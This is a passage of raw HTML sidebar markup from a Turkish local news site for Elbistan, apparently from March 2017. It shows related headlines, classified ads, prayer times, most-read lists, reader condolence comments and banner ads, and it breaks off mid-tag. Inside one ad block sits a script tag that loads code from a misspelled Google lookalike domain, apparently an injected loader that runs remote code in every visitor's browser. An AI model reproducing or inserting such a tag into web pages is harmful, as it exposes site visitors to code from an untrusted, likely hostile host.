Mahkemesi kuruldu</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-isci-alim-kurasi-basladi-h38134.html" title="Hastaneye işçi alım kurası başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastaneye_isci_alim_kurasi_basladi_h38134_583f7.jpg" alt="Hastaneye işçi alım kurası başladı" /> <span>Hastaneye işçi alım kurası başladı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/hastane-isci-cekilisi-bugun-yapilacak-h38129.html" title="Hastane işçi çekilişi bugün yapılacak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastane_isci_cekilisi_bugun_yapilacak_h38129_6a91c.jpg" alt="Hastane işçi çekilişi bugün yapılacak" /> <span>Hastane işçi çekilişi bugün yapılacak</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/banyoda-dusen-yasli-kadin-hayatini-kaybetti-h38128.html" title="Banyoda düşen yaşlı kadın, hayatını kaybetti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/banyoda_dusen_yasli_kadin_hayatini_kaybetti_h38128_c207d.jpg" alt="Banyoda düşen yaşlı kadın, hayatını kaybetti" /> <span>Banyoda düşen yaşlı kadın, hayatını kaybetti</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-31-145m2-daire-4254.html" title="SATLIK 3+1 145m2 DAİRE" >SATLIK 3+1 145m2 DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-31-145m2-daire-4254.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATLIK 3+1 145m2 DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/elemanlar-4238.html" title="elemanlar" >elemanlar</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/elemanlar-4238.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="elemanlar" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/oto-kabortaci-ustasi-4223.html" title="oto kabortacı ustası" >oto kabortacı ustası</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/oto-kabortaci-ustasi-4223.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="oto kabortacı ustası" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/eleman-araniyor-4221.html" title="Eleman Aranıyor" >Eleman Aranıyor</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/eleman-araniyor-4221.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Eleman Aranıyor" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mah-549m2-satilik-kosebasi-imarli-arsa-4220.html" title="YEŞİLYURT MAH. 549M2 SATILIK KÖŞEBAŞI İMARLI ARSA" >YEŞİLYURT MAH. 549M2 SATILIK KÖŞEBAŞI İMARLI ARSA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mah-549m2-satilik-kosebasi-imarli-arsa-4220.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/bb910196a794d19225aab17564fcbbb4a3b7ed14.jpg" alt="YEŞİLYURT MAH. 549M2 SATILIK KÖŞEBAŞI İMARLI ARSA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-goprusu-girisi-kosebasi-satilik-isyeri-4219.html" title="BATTALGAZİ GÖPRÜSÜ GİRİŞİ KÖŞEBAŞI SATILIK İŞYERİ" >BATTALGAZİ GÖPRÜSÜ GİRİŞİ KÖŞEBAŞI SATILIK İŞYERİ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-goprusu-girisi-kosebasi-satilik-isyeri-4219.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/4670ff38f96085b6c6b0e48d7225e199c5a2efa0.jpg" alt="BATTALGAZİ GÖPRÜSÜ GİRİŞİ KÖŞEBAŞI SATILIK İŞYERİ" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/parttaym-is-ariyorumm-4218.html" title="parttaym is ariyorumm" >parttaym is ariyorumm</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/parttaym-is-ariyorumm-4218.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="parttaym is ariyorumm" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mveysel-gcd-kiralik-31-luks-daire-4217.html" title="YEŞİLYURT M.VEYSEL G.CD. KIRALIK 3+1 LÜKS DAİRE" >YEŞİLYURT M.VEYSEL G.CD. KIRALIK 3+1 LÜKS DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mveysel-gcd-kiralik-31-luks-daire-4217.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/2351f7e77c51a47a8417e0fc3e3c202ffc6a6e67.jpg" alt="YEŞİLYURT M.VEYSEL G.CD. KIRALIK 3+1 LÜKS DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/termik-santrali-yolunda-tarla-4216.html" title="TERMİK SANTRALİ YOLUNDA TARLA" >TERMİK SANTRALİ YOLUNDA TARLA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/termik-santrali-yolunda-tarla-4216.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/32c2c4a4de7918ca2a2d015a8502ec32ecf70de9.jpg" alt="TERMİK SANTRALİ YOLUNDA TARLA" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-devren-satilik-4215.html" title="SAHİBİNDEN DEVREN SATILIK" >SAHİBİNDEN DEVREN SATILIK</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-devren-satilik-4215.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/7efd7b013291be8516526c16c867e395999b1c46.jpg" alt="SAHİBİNDEN DEVREN SATILIK" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bay-bayan-personeller-alinacak-4205.html" title="Bay-Bayan personeller alınacak" >Bay-Bayan personeller alınacak</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bay-bayan-personeller-alinacak-4205.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bay-Bayan personeller alınacak" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-sobali-ev-4204.html" title="kiralık sobalı ev" >kiralık sobalı ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-sobali-ev-4204.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralık sobalı ev" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/afsinde-imarli-satlik-mustakil-arsa-4203.html" title="Afşinde İmarlı Satlık Müstakil Arsa" >Afşinde İmarlı Satlık Müstakil Arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/afsinde-imarli-satlik-mustakil-arsa-4203.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/129eefc1c4c194be23a00c691ec1c0e6698cee66.jpg" alt="Afşinde İmarlı Satlık Müstakil Arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-dukkan-4202.html" title="kiralık dükkan" >kiralık dükkan</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-dukkan-4202.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralık dükkan" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-ev-4201.html" title="kiralık ev" >kiralık ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-ev-4201.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralık ev" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes">17.3B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/#" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/#" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>05:09</td> <td>06:43</td> <td>12:53</td> <td>16:12</td> <td>18:45</td> <td>20:07</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/bicaklanan-genc-yasamini-yitirdi-h37907.html" title="Bıçaklanan genç, yaşamını yitirdi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/bicaklanan_genc_yasamini_yitirdi_h37907_398b0.jpg" alt="Bıçaklanan genç, yaşamını yitirdi" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bicaklanan-genc-yasamini-yitirdi-h37907.html" title="" ><span class="en-hit">1.</span> <strong>Bıçaklanan genç, yaşamını yitirdi</strong> <span class="en-spot en-hidden">Elbistan’da iki kişi arasında başlayan tartışmanın bıçakların...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistan-sehidini-ugurladi-h37806.html" title="Elbistan, şehidini uğurladı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistan_sehidini_ugurladi_h37806_3e9f5.JPG" alt="Elbistan, şehidini uğurladı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-sehidini-ugurladi-h37806.html" title="" ><span class="en-hit">2.</span> <strong>Elbistan, şehidini uğurladı</strong> <span class="en-spot en-hidden">Fırat Kalkanı harekâtı bölgesinde, Türk Silahlı Kuvvetlerinin (TSK)...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/pazar-yerinde-buyuk-yangin-patlamalar-oluyor-h38096.html" title="Pazar yerinde büyük yangın, patlamalar..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/pazar_yerinde_buyuk_yangin_patlamalar_oluyor_h38096_2d859.jpg" alt="Pazar yerinde büyük yangın, patlamalar..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/pazar-yerinde-buyuk-yangin-patlamalar-oluyor-h38096.html" title="" ><span class="en-hit">3.</span> <strong>Pazar yerinde büyük yangın, patlamalar...</strong> <span class="en-spot en-hidden">Elbistan’da Açık Pazar yerinde büyük çaplı yangın çıktı. Alandaki...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/acik-pazar-yeri-alevlere-teslim-oldu-onlarca-tezgah-kule-dondu-h38097.html" title="Açık Pazar yeri alevlere teslim oldu,..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/acik_pazar_yeri_alevlere_teslim_oldu_onlarca_tezgah_kule_dondu_h38097_94dc9.jpg" alt="Açık Pazar yeri alevlere teslim oldu,..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/acik-pazar-yeri-alevlere-teslim-oldu-onlarca-tezgah-kule-dondu-h38097.html" title="" ><span class="en-hit">4.</span> <strong>Açık Pazar yeri alevlere teslim oldu,...</strong> <span class="en-spot en-hidden">Zücaciye ve ev eşyalarının satıldığı bölümden başlayan yangında...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/kura-cekimi-iptal-edildi-h37839.html" title="Kura çekimi iptal edildi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/kura_cekimi_iptal_edildi_h37839_7d278.jpg" alt="Kura çekimi iptal edildi" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kura-cekimi-iptal-edildi-h37839.html" title="" ><span class="en-hit">5.</span> <strong>Kura çekimi iptal edildi</strong> <span class="en-spot en-hidden">Yapımı tamamlanan ve önümüzdeki ay içerisinde açılması planlanan...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/kura-cekimi-iptal-edildi-h37839.html" title="Kura çekimi iptal edildi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/kura_cekimi_iptal_edildi_h37839_7d278.jpg" alt="Kura çekimi iptal edildi"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kura-cekimi-iptal-edildi-h37839.html" title="" ><span class="en-hit">1.</span> <strong>Kura çekimi iptal edildi</strong> <span class="en-spot en-hidden">Yapımı tamamlanan ve önümüzdeki ay içerisinde açılması planlanan...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/enver-dogan-49-yasinda-h37929.html" title="Enver Doğan 49 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/enver_dogan_49_yasinda_h37929_5ce9b.jpg" alt="Enver Doğan 49 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/enver-dogan-49-yasinda-h37929.html" title="" ><span class="en-hit">2.</span> <strong>Enver Doğan 49 yaşında</strong> <span class="en-spot en-hidden">Doğanlar kabilesinden merhum Hamit ve Servet Doğan ailesinin oğlu,</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/bicaklanan-genc-yasamini-yitirdi-h37907.html" title="Bıçaklanan genç, yaşamını yitirdi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/bicaklanan_genc_yasamini_yitirdi_h37907_398b0.jpg" alt="Bıçaklanan genç, yaşamını yitirdi"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bicaklanan-genc-yasamini-yitirdi-h37907.html" title="" ><span class="en-hit">3.</span> <strong>Bıçaklanan genç, yaşamını yitirdi</strong> <span class="en-spot en-hidden">Elbistan’da iki kişi arasında başlayan tartışmanın bıçakların...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-tap-75-yasinda-h37956.html" title="Mehmet Tap 75 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/mehmet_tap_75_yasinda_h37956_3e82f.jpg" alt="Mehmet Tap 75 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-tap-75-yasinda-h37956.html" title="" ><span class="en-hit">4.</span> <strong>Mehmet Tap 75 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/serkan-temel-19-yasinda-h37809.html" title="Serkan Temel 19 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/serkan_temel_19_yasinda_h37809_da3d1.jpg" alt="Serkan Temel 19 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/serkan-temel-19-yasinda-h37809.html" title="" ><span class="en-hit">5.</span> <strong>Serkan Temel 19 yaşında</strong> <span class="en-spot en-hidden">Köprübaşı mahallesinden Hasan ve Nuran Temel ailesinin oğlu,</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/navruz-purcuklu-89-yasinda-h38133.html#comment_175656" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET EYLESİN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/hastane-guvenlik-gorevlisi-olanlarin-isimleri-h38142.html#comment_175655" title="" >VAllaha kendimi tutamayıp söylicem çoğunluğu...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-arig-h38130.html#comment_175654" title="" >ALLAH Rahmet eylesin</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-arig-h38130.html#comment_175653" title="" >Merhuma Allah&#39;tan rahmet ailesine başsağlığı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-adliyesinde-aile-mahkemesi-kuruldu-h38136.html#comment_175652" title="" >Mevcut süren davalar aile mahkemesinemi...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethiye-yektausaklari-75-yasinda-h38132.html#comment_175651" title="" >Merhumeye Allah&#39;tan rahmet ailesine...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/navruz-purcuklu-89-yasinda-h38133.html#comment_175650" title="" >Merhumeye Allah&#39;tan rahmet ailesine...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-arig-h38130.html#comment_175649" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-dagli-77-yasinda-h38103.html#comment_175648" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-dagli-77-yasinda-h38103.html#comment_175646" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-arig-h38130.html#comment_175645" title="" >Merhuma Allahtan rahmet ,kederli ailesine...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-arig-h38130.html#comment_175644" title="" >Allah rahmet eylesin.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethiye-yektausaklari-75-yasinda-h38132.html#comment_175643" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLUR...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-arig-h38130.html#comment_175642" title="" >ALLAH RAHMET EYLESİN. MEKANI CENNET OLSUN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-temizlik-gorevlisi-olanlarin-isimleri-h38139.html#comment_175641" title="" >Telefon üzerinden mesaj olarak atilmayacakmi...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-temizlik-gorevlisi-olanlarin-isimleri-h38139.html#comment_175640" title="" >En az 5 isim sayarim hali hazirda yakıni...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-temizlik-gorevlisi-olanlarin-isimleri-h38139.html#comment_175639" title="" >Hayırlı Uğurlu Olsun.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-temizlik-gorevlisi-olanlarin-isimleri-h38139.html#comment_175638" title="" >Vatana millete hayırlı uğurlu olsun inşaAllah</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/pinarbasinda-su-seviyesi-yukseliyor-h38122.html#comment_175637" title="" >Başta haber sitesine yorum yazanlara bu...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-arig-h38130.html#comment_175636" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" selected>10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" selected>Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2017" selected>2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> <option value="2014" >2014</option> <option value="2013" >2013</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> <p style="width:165px;"><a href="http://www.elbistaninsesi.com/banner.php?id=57" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/modelce_1.gif" width="165" height="285" style="width:165px;height: 285px;border:0" alt="banner57" /></a></p> <p style="width:160px;"><a href="http://www.elbistaninsesi.com/banner.php?id=1" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/reklamaksu.gif" width="160" height="260" style="width:160px;height: 260px;border:0" alt="banner1" /></a></p> <p><a href="http://www.elbistaninsesi.com/banner.php?id=27" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/HSG_Tur.jpg&w=165&h=293&q=90" width="165" height="293" style="width:165px;height: 293px;border:0" alt="banner27" /></a></p> <p><a href="http://www.elbistaninsesi.com/banner.php?id=58" target="_blank" rel="nofollow"><img 